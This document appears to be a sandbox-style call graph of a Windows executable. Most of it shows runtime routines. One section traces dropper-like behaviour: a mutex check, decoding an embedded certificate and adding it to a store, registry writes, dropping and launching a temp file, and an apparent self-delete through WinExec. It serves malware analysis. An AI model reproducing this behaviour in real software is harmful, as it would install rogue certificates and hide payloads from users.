7045->7046 7048 40a798 7046->7048 7049 4067bc __write_nolock 67 API calls 7047->7049 7056 40a714 7048->7056 7050 40a77a 7049->7050 7053 40a788 __ioinit 7050->7053 7055 405f86 __amsg_exit 67 API calls 7050->7055 7053->7037 7055->7053 7057 40a718 7056->7057 7058 40a74a 7056->7058 7057->7058 7059 40a602 ___addlocaleref 8 API calls 7057->7059 7064 40a7bc 7058->7064 7060 40a72b 7059->7060 7060->7058 7067 40a688 7060->7067 7223 40518c LeaveCriticalSection 7064->7223 7066 40a7c3 7066->7050 7068 40a710 7067->7068 7069 40a691 InterlockedDecrement 7067->7069 7068->7058 7081 40a4c2 7068->7081 7070 40a6a7 InterlockedDecrement 7069->7070 7071 40a6aa 7069->7071 7070->7071 7072 40a6b4 InterlockedDecrement 7071->7072 7073 40a6b7 7071->7073 7072->7073 7074 40a6c1 InterlockedDecrement 7073->7074 7075 40a6c4 7073->7075 7074->7075 7076 40a6ce InterlockedDecrement 7075->7076 7078 40a6d1 7075->7078 7076->7078 7077 40a6e6 InterlockedDecrement 7077->7078 7078->7077 7079 40a6f6 InterlockedDecrement 7078->7079 7080 40a6ff InterlockedDecrement 7078->7080 7079->7078 7080->7068 7082 40a543 7081->7082 7083 40a4d6 7081->7083 7084 40a590 7082->7084 7085 402b57 __freebuf 67 API calls 7082->7085 7083->7082 7091 402b57 __freebuf 67 API calls 7083->7091 7107 40a50a 7083->7107 7094 40a5b7 7084->7094 7135 40c89b 7084->7135 7087 40a564 7085->7087 7089 402b57 __freebuf 67 API calls 7087->7089 7095 40a577 7089->7095 7090 402b57 __freebuf 67 API calls 7096 40a538 7090->7096 7097 40a4ff 7091->7097 7092 402b57 __freebuf 67 API calls 7092->7094 7093 40a5f6 7098 402b57 __freebuf 67 API calls 7093->7098 7094->7093 7100 402b57 67 API calls __freebuf 7094->7100 7101 402b57 __freebuf 67 API calls 7095->7101 7102 402b57 __freebuf 67 API calls 7096->7102 7111 40ca6b 7097->7111 7104 40a5fc 7098->7104 7099 402b57 __freebuf 67 API calls 7105 40a520 7099->7105 7100->7094 7106 40a585 7101->7106 7102->7082 7104->7058 7127 40ca2b 7105->7127 7109 402b57 __freebuf 67 API calls 7106->7109 7107->7099 7110 40a52b 7107->7110 7109->7084 7110->7090 7112 40ca74 7111->7112 7126 40caf1 7111->7126 7113 402b57 __freebuf 67 API calls 7112->7113 7115 40ca85 7112->7115 7113->7115 7114 40ca97 7117 40caa9 7114->7117 7118 402b57 __freebuf 67 API calls 7114->7118 7115->7114 7116 402b57 __freebuf 67 API calls 7115->7116 7116->7114 7119 40cabb 7117->7119 7121 402b57 __freebuf 67 API calls 7117->7121 7118->7117 7120 40cacd 7119->7120 7122 402b57 __freebuf 67 API calls 7119->7122 7123 40cadf 7120->7123 7124 402b57 __freebuf 67 API calls 7120->7124 7121->7119 7122->7120 7125 402b57 __freebuf 67 API calls 7123->7125 7123->7126 7124->7123 7125->7126 7126->7107 7128 40ca34 7127->7128 7134 40ca68 7127->7134 7129 402b57 __freebuf 67 API calls 7128->7129 7130 40ca44 7128->7130 7129->7130 7131 40ca56 7130->7131 7132 402b57 __freebuf 67 API calls 7130->7132 7133 402b57 __freebuf 67 API calls 7131->7133 7131->7134 7132->7131 7133->7134 7134->7110 7136 40c8a8 7135->7136 7137 40a5b0 7135->7137 7138 402b57 __freebuf 67 API calls 7136->7138 7137->7092 7139 40c8b0 7138->7139 7140 402b57 __freebuf 67 API calls 7139->7140 7141 40c8b8 7140->7141 7142 402b57 __freebuf 67 API calls 7141->7142 7143 40c8c0 7142->7143 7144 402b57 __freebuf 67 API calls 7143->7144 7145 40c8c8 7144->7145 7146 402b57 __freebuf 67 API calls 7145->7146 7147 40c8d0 7146->7147 7148 402b57 __freebuf 67 API calls 7147->7148 7149 40c8d8 7148->7149 7150 402b57 __freebuf 67 API calls 7149->7150 7151 40c8df 7150->7151 7152 402b57 __freebuf 67 API calls 7151->7152 7153 40c8e7 7152->7153 7154 402b57 __freebuf 67 API calls 7153->7154 7155 40c8ef 7154->7155 7156 402b57 __freebuf 67 API calls 7155->7156 7157 40c8f7 7156->7157 7158 402b57 __freebuf 67 API calls 7157->7158 7159 40c8ff 7158->7159 7160 402b57 __freebuf 67 API calls 7159->7160 7161 40c907 7160->7161 7162 402b57 __freebuf 67 API calls 7161->7162 7163 40c90f 7162->7163 7164 402b57 __freebuf 67 API calls 7163->7164 7165 40c917 7164->7165 7166 402b57 __freebuf 67 API calls 7165->7166 7167 40c91f 7166->7167 7168 402b57 __freebuf 67 API calls 7167->7168 7169 40c927 7168->7169 7170 402b57 __freebuf 67 API calls 7169->7170 7171 40c932 7170->7171 7172 402b57 __freebuf 67 API calls 7171->7172 7173 40c93a 7172->7173 7174 402b57 __freebuf 67 API calls 7173->7174 7175 40c942 7174->7175 7176 402b57 __freebuf 67 API calls 7175->7176 7177 40c94a 7176->7177 7178 402b57 __freebuf 67 API calls 7177->7178 7179 40c952 7178->7179 7180 402b57 __freebuf 67 API calls 7179->7180 7181 40c95a 7180->7181 7182 402b57 __freebuf 67 API calls 7181->7182 7183 40c962 7182->7183 7184 402b57 __freebuf 67 API calls 7183->7184 7185 40c96a 7184->7185 7186 402b57 __freebuf 67 API calls 7185->7186 7187 40c972 7186->7187 7188 402b57 __freebuf 67 API calls 7187->7188 7189 40c97a 7188->7189 7190 402b57 __freebuf 67 API calls 7189->7190 7191 40c982 7190->7191 7192 402b57 __freebuf 67 API calls 7191->7192 7193 40c98a 7192->7193 7194 402b57 __freebuf 67 API calls 7193->7194 7195 40c992 7194->7195 7196 402b57 __freebuf 67 API calls 7195->7196 7197 40c99a 7196->7197 7198 402b57 __freebuf 67 API calls 7197->7198 7199 40c9a2 7198->7199 7200 402b57 __freebuf 67 API calls 7199->7200 7201 40c9aa 7200->7201 7202 402b57 __freebuf 67 API calls 7201->7202 7203 40c9b8 7202->7203 7204 402b57 __freebuf 67 API calls 7203->7204 7205 40c9c3 7204->7205 7206 402b57 __freebuf 67 API calls 7205->7206 7207 40c9ce 7206->7207 7208 402b57 __freebuf 67 API calls 7207->7208 7209 40c9d9 7208->7209 7210 402b57 __freebuf 67 API calls 7209->7210 7211 40c9e4 7210->7211 7212 402b57 __freebuf 67 API calls 7211->7212 7213 40c9ef 7212->7213 7214 402b57 __freebuf 67 API calls 7213->7214 7215 40c9fa 7214->7215 7216 402b57 __freebuf 67 API calls 7215->7216 7217 40ca05 7216->7217 7218 402b57 __freebuf 67 API calls 7217->7218 7219 40ca10 7218->7219 7220 402b57 __freebuf 67 API calls 7219->7220 7221 40ca1b 7220->7221 7222 402b57 __freebuf 67 API calls 7221->7222 7222->7137 7223->7066 7225 409f97 7224->7225 7227 409eee _memset 7224->7227 7229 4027ab __putwch_nolock 5 API calls 7225->7229 7234 40c85b 7227->7234 7231 40a039 7229->7231 7231->7020 7233 40c660 ___crtLCMapStringA 102 API calls 7233->7225 7235 40457e _LocaleUpdate::_LocaleUpdate 77 API calls 7234->7235 7236 40c86c 7235->7236 7244 40c6a3 7236->7244 7239 40c660 7240 40457e _LocaleUpdate::_LocaleUpdate 77 API calls 7239->7240 7241 40c671 7240->7241 7340 40c2be 7241->7340 7245 40c6c2 GetStringTypeW 7244->7245 7246 40c6ed 7244->7246 7247 40c6e2 GetLastError 7245->7247 7248 40c6da 7245->7248 7246->7248 7249 40c7d4 7246->7249 7247->7246 7250 40c726 MultiByteToWideChar 7248->7250 7260 40c7ce 7248->7260 7291 40d73d GetLocaleInfoA 7249->7291 7251 40c753 7250->7251 7250->7260 7267 40c768 _memset __alloca_probe_16 7251->7267 7268 402c34 7251->7268 7253 4027ab __putwch_nolock 5 API calls 7254 409f52 7253->7254 7254->7239 7255 40c825 GetStringTypeA 7259 40c840 7255->7259 7255->7260 7258 40c7a1 MultiByteToWideChar 7263 40c7b7 GetStringTypeW 7258->7263 7264 40c7c8 7258->7264 7265 402b57 __freebuf 67 API calls 7259->7265 7260->7253 7263->7264 7287 40c2a3 7264->7287 7265->7260 7267->7258 7267->7260 7269 402ce1 7268->7269 7282 402c42 7268->7282 7270 4043fc __calloc_impl 4 API calls 7269->7270 7271 402ce7 7270->7271 7273 403d90 __write_nolock 66 API calls 7271->7273 7272 40642e __FF_MSGBANNER 66 API calls 7278 402c57 7272->7278 7274 402ced 7273->7274 7274->7267 7276 40628e __NMSG_WRITE 66 API calls 7276->7278 7277 402ca5 HeapAlloc 7277->7282 7278->7272 7278->7276 7278->7277 7279 405fd0 _fast_error_exit 3 API calls 7278->7279 7278->7282 7279->7278 7280 402cd8 7280->7267 7281 402ccc 7284 403d90 __write_nolock 66 API calls 7281->7284 7282->7278 7282->7280 7282->7281 7283 4043fc __calloc_impl 4 API calls 7282->7283 7285 402cca 7282->7285 7322 402be5 7282->7322 7283->7282 7284->7285 7286 403d90 __write_nolock 66 API calls 7285->7286 7286->7280 7288 40c2ab 7287->7288 7290 40c2bc 7287->7290 7289 402b57 __freebuf 67 API calls 7288->7289 7288->7290 7289->7290 7290->7260 7292 40d769 7291->7292 7293 40d76e 7291->7293 7295 4027ab __putwch_nolock 5 API calls 7292->7295 7333 40bc9c 7293->7333 7296 40c7f8 7295->7296 7296->7255 7296->7260 7297 40d784 7296->7297 7298 40d7c2 GetCPInfo 7297->7298 7302 40d84c 7297->7302 7299 40d837 MultiByteToWideChar 7298->7299 7300 40d7d9 7298->7300 7299->7302 7306 40d7f2 _strlen 7299->7306 7300->7299 7303 40d7df GetCPInfo 7300->7303 7301 4027ab __putwch_nolock 5 API calls 7304 40c819 7301->7304 7302->7301 7303->7299 7305 40d7ec 7303->7305 7304->7255 7304->7260 7305->7299 7305->7306 7307 402c34 _malloc 67 API calls 7306->7307 7308 40d824 _memset __alloca_probe_16 7306->7308 7307->7308 7308->7302 7309 40d881 MultiByteToWideChar 7308->7309 7310 40d899 7309->7310 7314 40d8b8 7309->7314 7311 40d8a0 WideCharToMultiByte 7310->7311 7312 40d8bd 7310->7312 7311->7314 7315 40d8c8 WideCharToMultiByte 7312->7315 7316 40d8dc 7312->7316 7313 40c2a3 __freea 67 API calls 7313->7302 7314->7313 7315->7314 7315->7316 7317 4093a0 __calloc_crt 67 API calls 7316->7317 7318 40d8e4 7317->7318 7318->7314 7319 40d8ed WideCharToMultiByte 7318->7319 7319->7314 7320 40d8ff 7319->7320 7321 402b57 __freebuf 67 API calls 7320->7321 7321->7314 7323 402bf1 __ioinit 7322->7323 7324 402c22 __ioinit 7323->7324 7325 405264 __lock 67 API calls 7323->7325 7324->7282 7326 402c07 7325->7326 7327 405ab1 ___sbh_alloc_block 5 API calls 7326->7327 7328 402c12 7327->7328 7330 402c2b 7328->7330 7331 40518c _doexit LeaveCriticalSection 7330->7331 7332 402c32 7331->7332 7332->7324 7336 40cdc4 7333->7336 7337 40cddb 7336->7337 7338 40cb99 strtoxl 91 API calls 7337->7338 7339 40bca9 7338->7339 7339->7292 7341 40c2dd LCMapStringW 7340->7341 7344 40c2f8 7340->7344 7342 40c300 GetLastError 7341->7342 7341->7344 7342->7344 7343 40c4f5 7347 40d73d ___ansicp 91 API calls 7343->7347 7344->7343 7345 40c352 7344->7345 7346 40c36b MultiByteToWideChar 7345->7346 7369 40c4ec 7345->7369 7355 40c398 7346->7355 7346->7369 7348 40c51d 7347->7348 7351 40c611 LCMapStringA 7348->7351 7352 40c536 7348->7352 7348->7369 7349 4027ab __putwch_nolock 5 API calls 7350 409f72 7349->7350 7350->7233 7365 40c56d 7351->7365 7353 40d784 ___convertcp 74 API calls 7352->7353 7358 40c548 7353->7358 7354 40c3e9 MultiByteToWideChar 7359 40c402 LCMapStringW 7354->7359 7382 40c4e3 7354->7382 7356 40c3b1 __alloca_probe_16 7355->7356 7357 402c34 _malloc 67 API calls 7355->7357 7356->7354 7356->7369 7357->7356 7361 40c552 LCMapStringA 7358->7361 7358->7369 7363 40c423 7359->7363 7359->7382 7360 402b57 __freebuf 67 API calls 7364 40c638 7360->7364 7361->7365 7371 40c574 7361->7371 7362 40c2a3 __freea 67 API calls 7362->7369 7366 40c42b 7363->7366 7370 40c454 7363->7370 7367 402b57 __freebuf 67 API calls 7364->7367 7364->7369 7365->7360 7365->7364 7368 40c43d LCMapStringW 7366->7368 7366->7382 7367->7369 7368->7382 7369->7349 7376 40c46f __alloca_probe_16 7370->7376 7378 402c34 _malloc 67 API calls 7370->7378 7373 402c34 _malloc 67 API calls 7371->7373 7377 40c585 _memset __alloca_probe_16 7371->7377 7372 40c4a3 LCMapStringW 7374 40c4bb WideCharToMultiByte 7372->7374 7375 40c4dd 7372->7375 7373->7377 7374->7375 7379 40c2a3 __freea 67 API calls 7375->7379 7376->7372 7376->7382 7377->7365 7380 40c5c3 LCMapStringA 7377->7380 7378->7376 7379->7382 7383 40c5e3 7380->7383 7384 40c5df 7380->7384 7382->7362 7385 40d784 ___convertcp 74 API calls 7383->7385 7386 40c2a3 __freea 67 API calls 7384->7386 7385->7384 7386->7365 7387->7028 7390 40a7cc 7388->7390 7391 40a7e4 7390->7391 7395 406546 TlsGetValue 7390->7395 7391->6593 7402 4043a4 7392->7402 7394 4043e9 7394->6595 7396 406559 7395->7396 7397 40657a GetModuleHandleA 7395->7397 7396->7397 7400 406563 TlsGetValue 7396->7400 7398 406572 7397->7398 7399 406589 GetProcAddress 7397->7399 7398->7390 7399->7398 7401 40656e 7400->7401 7401->7397 7401->7398 7403 4043b0 __ioinit 7402->7403 7410 405fe5 7403->7410 7409 4043d1 __ioinit 7409->7394 7411 405264 __lock 67 API calls 7410->7411 7412 4043b5 7411->7412 7413 4042c8 7412->7413 7414 4065b2 __decode_pointer 4 API calls 7413->7414 7415 4042d8 7414->7415 7416 4065b2 __decode_pointer 4 API calls 7415->7416 7417 4042e9 7416->7417 7421 404363 7417->7421 7431 409483 7417->7431 7419 404303 7422 404325 7419->7422 7427 40434e 7419->7427 7444 4093e8 7419->7444 7420 406546 __encode_pointer 4 API calls 7420->7421 7428 4043da 7421->7428 7422->7421 7424 4093e8 __realloc_crt 73 API calls 7422->7424 7425 40433c 7422->7425 7424->7425 7425->7421 7426 406546 __encode_pointer 4 API calls 7425->7426 7426->7427 7427->7420 7493 405fee 7428->7493 7432 40948f __ioinit 7431->7432 7433 4094bc 7432->7433 7434 40949f 7432->7434 7435 4094fd HeapSize 7433->7435 7437 405264 __lock 67 API calls 7433->7437 7436 403d90 __write_nolock 67 API calls 7434->7436 7440 4094b4 __ioinit 7435->7440 7438 4094a4 7436->7438 7441 4094cc ___sbh_find_block 7437->7441 7439 402f43 __write_nolock 4 API calls 7438->7439 7439->7440 7440->7419 7449 40951d 7441->7449 7446 4093ec 7444->7446 7447 40942e 7446->7447 7448 40940f Sleep 7446->7448 7453 40bdcb 7446->7453 7447->7422 7448->7446 7452 40518c LeaveCriticalSection 7449->7452 7451 4094f8 7451->7435 7451->7440 7452->7451 7454 40bdd7 __ioinit 7453->7454 7455 40bdec 7454->7455 7456 40bdde 7454->7456 7458 40bdf3 7455->7458 7459 40bdff 7455->7459 7457 402c34 _malloc 67 API calls 7456->7457 7461 40bde6 __dosmaperr __ioinit 7457->7461 7460 402b57 __freebuf 67 API calls 7458->7460 7466 40bf71 7459->7466 7468 40be0c ___sbh_resize_block ___sbh_find_block ___crtGetEnvironmentStringsA 7459->7468 7460->7461 7461->7446 7462 40bfa4 7464 4043fc __calloc_impl 4 API calls 7462->7464 7463 40bf76 HeapReAlloc 7463->7461 7463->7466 7467 40bfaa 7464->7467 7465 405264 __lock 67 API calls 7465->7468 7466->7462 7466->7463 7469 40bfc8 7466->7469 7471 4043fc __calloc_impl 4 API calls 7466->7471 7473 40bfbe 7466->7473 7470 403d90 __write_nolock 67 API calls 7467->7470 7468->7461 7468->7462 7468->7465 7477 40be97 HeapAlloc 7468->7477 7480 40beec HeapReAlloc 7468->7480 7481 405ab1 ___sbh_alloc_block 5 API calls 7468->7481 7482 40bf57 7468->7482 7483 4043fc __calloc_impl 4 API calls 7468->7483 7486 40bf3a 7468->7486 7488 405308 __VEC_memcpy VirtualFree VirtualFree HeapFree ___sbh_free_block 7468->7488 7489 40bf0f 7468->7489 7469->7461 7472 403d90 __write_nolock 67 API calls 7469->7472 7470->7461 7471->7466 7474 40bfd1 GetLastError 7472->7474 7476 403d90 __write_nolock 67 API calls 7473->7476 7474->7461 7478 40bf3f 7476->7478 7477->7468 7478->7461 7479 40bf44 GetLastError 7478->7479 7479->7461 7480->7468 7481->7468 7482->7461 7484 403d90 __write_nolock 67 API calls 7482->7484 7483->7468 7485 40bf64 7484->7485 7485->7461 7485->7474 7487 403d90 __write_nolock 67 API calls 7486->7487 7487->7478 7488->7468 7492 40518c LeaveCriticalSection 7489->7492 7491 40bf16 7491->7468 7492->7491 7496 40518c LeaveCriticalSection 7493->7496 7495 4043df 7495->7409 7496->7495 7500 40b944 7497->7500 7501 40457e _LocaleUpdate::_LocaleUpdate 77 API calls 7500->7501 7502 40b955 7501->7502 7502->6600 7527 401d20 InitializeSecurityDescriptor SetSecurityDescriptorDacl CreateMutexA 7503->7527 7506 401183 ExitProcess 7507 40118b 7530 401870 CryptStringToBinaryA 7507->7530 7509 401230 7586 401d90 7509->7586 7512 401870 121 API calls 7514 40119d RegCreateKeyExA 7512->7514 7516 4011d8 7514->7516 7517 4011cd RegCloseKey 7514->7517 7515 4027ab __putwch_nolock 5 API calls 7518 40124b 7515->7518 7560 401040 7516->7560 7517->7516 7518->6521 7518->6605 7520 4011dd _memset 7521 4011f3 GetTempPathA 7520->7521 7569 4029a3 7521->7569 7525 401226 7581 401e80 7525->7581 7528 40117f 7527->7528 7529 401d6f GetLastError 7527->7529 7528->7506 7528->7507 7529->7528 7531 4018b1 7530->7531 7532 401a92 7530->7532 7531->7532 7533 402c34 _malloc 67 API calls 7531->7533 7534 4027ab __putwch_nolock 5 API calls 7532->7534 7535 4018c3 7533->7535 7536 401190 7534->7536 7535->7532 7537 4018d0 CryptStringToBinaryA CertCreateCertificateContext 7535->7537 7536->7509 7536->7512 7538 402b57 __freebuf 67 API calls 7537->7538 7539 4018f7 7538->7539 7539->7532 7540 401902 CertOpenStore 7539->7540 7541 401924 CertAddCertificateContextToStore 7540->7541 7542 401a85 CertFreeCertificateContext 7540->7542 7543 401938 GetLastError 7541->7543 7544 401a7c CertCloseStore 7541->7544 7542->7532 7543->7544 7545 401949 CertGetCertificateContextProperty 7543->7545 7544->7542 7545->7544 7546 40196f 7545->7546 7547 402c34 _malloc 67 API calls 7546->7547 7548 401978 _memset 7547->7548 7548->7544 7549 401995 CertGetCertificateContextProperty 7548->7549 7555 4019bf _memset 7549->7555 7550 401a33 SHGetSpecialFolderPathA 7593 402adc 7550->7593 7552 402adc _sprintf 103 API calls 7552->7555 7555->7550 7555->7552 7557 401a2f 7555->7557 7556 401a6f 7558 402b57 __freebuf 67 API calls 7556->7558 7557->7550 7559 401a79 7558->7559 7559->7544 7866 4013b0 7560->7866 7562 4010c4 7563 4013b0 std::_String_base::_Xlen 75 API calls 7562->7563 7564 4010e7 7563->7564 7878 402220 7564->7878 7566 4010fe ctype 7567 4027ab __putwch_nolock 5 API calls 7566->7567 7568 401151 7567->7568 7568->7520 7570 4029b8 7569->7570 7572 4029b0 7569->7572 7571 403d90 __write_nolock 67 API calls 7570->7571 7573 4029bd 7571->7573 7572->7570 7576 4029ed 7572->7576 7574 402f43 __write_nolock 4 API calls 7573->7574 7575 40121a 7574->7575 7578 401e30 CreateFileA WriteFile 7575->7578 7576->7575 7577 403d90 __write_nolock 67 API calls 7576->7577 7577->7573 7579 401e68 7578->7579 7580 401e6d CloseHandle 7578->7580 7579->7580 7580->7525 7582 403de0 _memset 7581->7582 7583 401e9c CreateProcessA 7582->7583 7584 401ec3 CloseHandle CloseHandle 7583->7584 7585 401edc 7583->7585 7584->7585 7585->7509 7587 401dba _memset 7586->7587 7588 401dd6 GetModuleFileNameA 7587->7588 7589 402adc _sprintf 103 API calls 7588->7589 7590 401e01 WinExec 7589->7590 7591 4027ab __putwch_nolock 5 API calls 7590->7591 7592 401238 7591->7592 7592->7515 7594 402b07 7593->7594 7595 402aea 7593->7595 7594->7595 7597 402b0e 7594->7597 7596 403d90 __write_nolock 67 API calls 7595->7596 7598 402aef 7596->7598 7612 4046a1 7597->7612 7600 402f43 __write_nolock 4 API calls 7598->7600 7602 401a63 7600->7602 7604 401790 PathFileExistsA 7602->7604 7605 401862 7604->7605 7606 4017ab CreateFileA 7604->7606 7605->7556 7606->7605 7607 4017cb GetFileTime 7606->7607 7607->7605 7608 4017e5 SystemTimeToFileTime 7607->7608 7609 40183b __aulldiv 7608->7609 7864 401710 GetSystemTime SystemTimeToFileTime SystemTimeToFileTime 7609->7864 7611 401844 7611->7556 7611->7605 7613 40457e _LocaleUpdate::_LocaleUpdate 77 API calls 7612->7613 7614 4046fc 7613->7614 7615 404701 7614->7615 7617 4047c2 7614->7617 7670 409e06 7614->7670 7616 403d90 __write_nolock 67 API calls 7615->7616 7618 404706 7616->7618 7617->7615 7645 4047e7 __output_l __aulldvrm _strlen 7617->7645 7622 402f43 __write_nolock 4 API calls 7618->7622 7620 404741 7621 40476f 7620->7621 7623 409e06 __output_l 67 API calls 7620->7623 7621->7615 7627 409e06 __output_l 67 API calls 7621->7627 7624 404716 7622->7624 7625 40474f 7623->7625 7626 4027ab __putwch_nolock 5 API calls 7624->7626 7625->7621 7629 409e06 __output_l 67 API calls 7625->7629 7628 402b34 7626->7628 7630 404794 7627->7630 7628->7602 7649 40441e 7628->7649 7631 40475d 7629->7631 7630->7617 7634 409e06 __output_l 67 API calls 7630->7634 7633 409e06 __output_l 67 API calls 7631->7633 7633->7621 7635 4047a2 7634->7635 7635->7617 7637 409e06 __output_l 67 API calls 7635->7637 7636 404600 101 API calls _write_string 7636->7645 7639 4047b0 7637->7639 7638 404fd7 7642 403d90 __write_nolock 67 API calls 7638->7642 7641 409e06 __output_l 67 API calls 7639->7641 7640 402b57 __freebuf 67 API calls 7640->7645 7641->7617 7642->7618 7643 40a946 79 API calls _wctomb_s 7643->7645 7644 409360 __malloc_crt 67 API calls 7644->7645 7645->7624 7645->7636 7645->7638 7645->7640 7645->7643 7645->7644 7646 404657 101 API calls _write_string 7645->7646 7647 4065b2 TlsGetValue TlsGetValue GetModuleHandleA GetProcAddress __decode_pointer 7645->7647 7648 404633 101 API calls _write_multi_char 7645->7648 7677 40a961 7645->7677 7646->7645 7647->7645 7648->7645 7650 409e06 __output_l 67 API calls 7649->7650 7651 40442c 7650->7651 7652 404437 7651->7652 7653 40444e 7651->7653 7655 403d90 __write_nolock 67 API calls 7652->7655 7654 404452 7653->7654 7664 40445f __stbuf 7653->7664 7656 403d90 __write_nolock 67 API calls 7654->7656 7657 40443c 7655->7657 7656->7657 7657->7602 7658 40454d 7660 409c88 __locking 101 API calls 7658->7660 7659 4044cd 7661 4044e4 7659->7661 7663 404501 7659->7663 7660->7657 7693 409c88 7661->7693 7663->7657 7718 4095a9 7663->7718 7664->7657 7666 4044b4 7664->7666 7669 4044bf 7664->7669 7680 409da8 7664->7680 7666->7669 7690 409d64 7666->7690 7669->7658 7669->7659 7671 409e11 7670->7671 7672 409e2e 7670->7672 7673 403d90 __write_nolock 67 API calls 7671->7673 7672->7620 7674 409e16 7673->7674 7675 402f43 __write_nolock 4 API calls 7674->7675 7676 409e26 7675->7676 7676->7620 7678 40457e _LocaleUpdate::_LocaleUpdate 77 API calls 7677->7678 7679 40a972 7678->7679 7679->7645 7681 409db1 7680->7681 7682 409dbf 7680->7682 7683 403d90 __write_nolock 67 API calls 7681->7683 7685 409dea 7682->7685 7686 403d90 __write_nolock 67 API calls 7682->7686 7684 409db6 7683->7684 7684->7666 7685->7666 7687 409dd3 7686->7687 7688 402f43 __write_nolock 4 API calls 7687->7688 7689 409de3 7688->7689 7689->7666 7691 409360 __malloc_crt 67 API calls 7690->7691 7692 409d74 7691->7692 7692->7669 7694 409c94 __ioinit 7693->7694 7695 409cb7 7694->7695 7696 409c9c 7694->7696 7698 409cc5 7695->7698 7702 409d06 7695->7702 7750 403da3 7696->7750 7699 403da3 __write_nolock 67 API calls 7698->7699 7701 409cca 7699->7701 7704 403d90 __write_nolock 67 API calls 7701->7704 7753 40c11f 7702->7753 7703 403d90 __write_nolock 67 API calls 7706 409ca9 __ioinit 7703->7706 7707 409cd1 7704->7707 7706->7657 7709 402f43 __write_nolock 4 API calls 7707->7709 7708 409d0c 7710 409d19 7708->7710 7711 409d2f 7708->7711 7709->7706 7763 4096c2 7710->7763 7713 403d90 __write_nolock 67 API calls 7711->7713 7714 409d34 7713->7714 7716 403da3 __write_nolock 67 API calls 7714->7716 7715 409d27 7820 409d5a 7715->7820 7716->7715 7719 4095b5 __ioinit 7718->7719 7720 4095e2 7719->7720 7721 4095c6 7719->7721 7723 4095f0 7720->7723 7725 409611 7720->7725 7722 403da3 __write_nolock 67 API calls 7721->7722 7724 4095cb 7722->7724 7726 403da3 __write_nolock 67 API calls 7723->7726 7729 403d90 __write_nolock 67 API calls 7724->7729 7727 409631 7725->7727 7728 409657 7725->7728 7730 4095f5 7726->7730 7731 403da3 __write_nolock 67 API calls 7727->7731 7732 40c11f ___lock_fhandle 68 API calls 7728->7732 7742 4095d3 __ioinit 7729->7742 7733 403d90 __write_nolock 67 API calls 7730->7733 7734 409636 7731->7734 7735 40965d 7732->7735 7736 4095fc 7733->7736 7737 403d90 __write_nolock 67 API calls 7734->7737 7738 409686 7735->7738 7739 40966a 7735->7739 7740 402f43 __write_nolock 4 API calls 7736->7740 7741 40963d 7737->7741 7744 403d90 __write_nolock 67 API calls 7738->7744 7743 409526 __lseeki64_nolock 69 API calls 7739->7743 7740->7742 7745 402f43 __write_nolock 4 API calls 7741->7745 7742->7657 7746 40967b 7743->7746 7747 40968b 7744->7747 7745->7742 7860 4096b8 7746->7860 7748 403da3 __write_nolock 67 API calls 7747->7748 7748->7746 7751 406739 __getptd_noexit 67 API calls 7750->7751 7752 403da8 7751->7752 7752->7703 7754 40c12b __ioinit 7753->7754 7755 40c186 7754->7755 7757 405264 __lock 67 API calls 7754->7757 7756 40c18b EnterCriticalSection 7755->7756 7758 40c1a8 __ioinit 7755->7758 7756->7758 7759 40c157 7757->7759 7758->7708 7760 40c16e 7759->7760 7762 40aa5f ___crtInitCritSecAndSpinCount 67 API calls 7759->7762 7823 40c1b6 7760->7823 7762->7760 7764 4096fe 7763->7764 7811 4096f7 7763->7811 7765 409702 7764->7765 7766 409729 7764->7766 7767 403da3 __write_nolock 67 API calls 7765->7767 7771 409793 7766->7771 7772 40976d 7766->7772 7769 409707 7767->7769 7768 4027ab __putwch_nolock 5 API calls 7770 409c80 7768->7770 7774 403d90 __write_nolock 67 API calls 7769->7774 7770->7715 7773 4097a5 7771->7773 7827 409526 7771->7827 7775 403da3 __write_nolock 67 API calls 7772->7775 7778 409da8 __write_nolock 67 API calls 7773->7778 7777 40970e 7774->7777 7779 409772 7775->7779 7781 402f43 __write_nolock 4 API calls 7777->7781 7782 4097ae 7778->7782 7780 403d90 __write_nolock 67 API calls 7779->7780 7783 40977b 7780->7783 7781->7811 7784 4099ad 7782->7784 7791 4067bc __write_nolock 67 API calls 7782->7791 7785 402f43 __write_nolock 4 API calls 7783->7785 7786 409be0 WriteFile 7784->7786 7787 4099bb 7784->7787 7785->7811 7790 409c07 GetLastError 7786->7790 7807 4099a8 7786->7807 7788 4099cd 7787->7788 7789 409a5e 7787->7789 7792 409c41 7788->7792 7797 409a18 WriteFile 7788->7797 7788->7807 7796 409a68 7789->7796 7813 409b05 7789->7813 7790->7807 7793 4097c9 GetConsoleMode 7791->7793 7798 403d90 __write_nolock 67 API calls 7792->7798 7792->7811 7793->7784 7794 4097ed 7793->7794 7794->7784 7795 4097fb GetConsoleCP 7794->7795 7795->7807 7815 40981b 7795->7815 7796->7792 7801 409abb WriteFile 7796->7801 7796->7807 7797->7788 7797->7790 7802 409c2e 7798->7802 7799 409b5b WideCharToMultiByte 7799->7790 7805 409b8e WriteFile 7799->7805 7800 409c21 7803 409c36 7800->7803 7804 409c29 7800->7804 7801->7790 7801->7796 7806 403da3 __write_nolock 67 API calls 7802->7806 7840 403db6 7803->7840 7808 403d90 __write_nolock 67 API calls 7804->7808 7809 409bbc GetLastError 7805->7809 7805->7813 7806->7811 7807->7792 7807->7800 7807->7811 7808->7802 7809->7813 7811->7768 7813->7792 7813->7799 7813->7805 7813->7807 7814 40b8f9 79 API calls __write_nolock 7814->7815 7815->7790 7815->7807 7815->7814 7816 409893 WideCharToMultiByte 7815->7816 7817 40c1e1 11 API calls __putwch_nolock 7815->7817 7819 4098fa WriteFile 7815->7819 7837 40a997 7815->7837 7816->7807 7818 4098c1 WriteFile 7816->7818 7817->7815 7818->7790 7818->7815 7819->7790 7819->7815 7859 40c1bf LeaveCriticalSection 7820->7859 7822 409d62 7822->7706 7826 40518c LeaveCriticalSection 7823->7826 7825 40c1bd 7825->7755 7826->7825 7845 40c0ae 7827->7845 7829 409542 7830 40954a 7829->7830 7831 40955b SetFilePointer 7829->7831 7832 403d90 __write_nolock 67 API calls 7830->7832 7833 409573 GetLastError 7831->7833 7834 40954f 7831->7834 7832->7834 7833->7834 7835 40957d 7833->7835 7834->7773 7836 403db6 __dosmaperr 67 API calls 7835->7836 7836->7834 7838 40a961 __isleadbyte_l 77 API calls 7837->7838 7839 40a9a2 7838->7839 7839->7815 7841 403da3 __write_nolock 67 API calls 7840->7841 7842 403dbc __dosmaperr 7841->7842 7843 403d90 __write_nolock 67 API calls 7842->7843 7844 403dd0 7843->7844 7844->7811 7846 40c0b7 7845->7846 7847 40c0ce 7845->7847 7848 403da3 __write_nolock 67 API calls 7846->7848 7850 403da3 __write_nolock 